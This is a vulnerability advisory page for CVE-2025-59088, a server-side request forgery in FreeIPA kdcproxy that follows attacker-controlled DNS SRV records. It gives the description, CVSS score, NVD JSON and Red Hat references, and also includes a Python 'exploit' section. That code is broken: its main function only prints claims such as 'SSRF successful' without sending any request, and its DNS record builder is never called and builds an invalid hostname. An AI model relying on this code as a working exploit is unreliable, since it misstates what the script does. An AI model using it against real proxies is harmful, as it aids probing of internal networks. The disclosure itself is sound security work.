Security Vulnerability Report
中文
CVE-2025-59088 CVSS 8.6 HIGH

CVE-2025-59088

Published: 2025-11-12 17:15:38
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

If kdcproxy receives a request for a realm which does not have server addresses defined in its configuration, by default, it will query SRV records in the DNS zone matching the requested realm name. This creates a server-side request forgery vulnerability, since an attacker could send a request for a realm matching a DNS zone where they created SRV records pointing to arbitrary ports and hostnames (which may resolve to loopback or internal IP addresses). This vulnerability can be exploited to probe internal network topology and firewall rules, perform port scanning, and exfiltrate data. Deployments where the "use_dns" setting is explicitly set to false are not affected.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FreeIPA kdcproxy (所有未设置use_dns=false的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-59088 PoC - kdcproxy SSRF Note: This is for educational purposes only """ import socket import struct import dnslib from dnslib import DNSRecord, QTYPE, RR, A def create_malicious_srv_response(): """ Create a DNS response with malicious SRV record pointing to internal host """ # Target internal IP to probe target_ip = "10.0.0.1" # Internal network address # Create SRV record pointing to internal service srv_data = f"0 100 88 kdc.{target_ip}" # DNS response construction reply = DNSRecord() reply.header.id = 12345 reply.add_answer(RR( "_kerberos._tcp.example.com", QTYPE.SRV, ttl=300, rdata=f"0 100 88 kdc.{target_ip}" )) return reply.pack() def exploit_kdcproxy(target_host, realm): """ Simulate sending request to kdcproxy that triggers DNS lookup """ # Craft Kerberos AS-REQ for the target realm # In real attack, this would be sent to the vulnerable kdcproxy print(f"[*] Targeting: {target_host}") print(f"[*] Requesting realm: {realm}") print(f"[*] kdcproxy will query DNS for _kerberos._tcp.{realm}") print(f"[*] Attacker controls DNS, returns malicious SRV record") print(f"[*] kdcproxy connects to internal IP: 10.0.0.1:88") print(f"[!] SSRF successful - internal network probed") if __name__ == "__main__": target = "vulnerable-kdcproxy.example.com" malicious_realm = "attacker-controlled-domain.com" exploit_kdcproxy(target, malicious_realm)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59088", "sourceIdentifier": "[email protected]", "published": "2025-11-12T17:15:38.153", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "If kdcproxy receives a request for a realm which does not have server addresses defined in its configuration, by default, it will query SRV records in the DNS zone matching the requested realm name. This creates a server-side request forgery vulnerability, since an attacker could send a request for a realm matching a DNS zone where they created SRV records pointing to arbitrary ports and hostnames (which may resolve to loopback or internal IP addresses). This vulnerability can be exploited to probe internal network topology and firewall rules, perform port scanning, and exfiltrate data. Deployments where\nthe \"use_dns\" setting is explicitly set to false are not affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:21138", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21139", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21140", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21141", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21142", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21448", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21748", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21806", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21818", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21819", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21820", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:21821", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:22982", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-59088", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2393955", "source": "[email protected]"}, {"url": "https://github.com/latchset/kdcproxy/pull/68", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.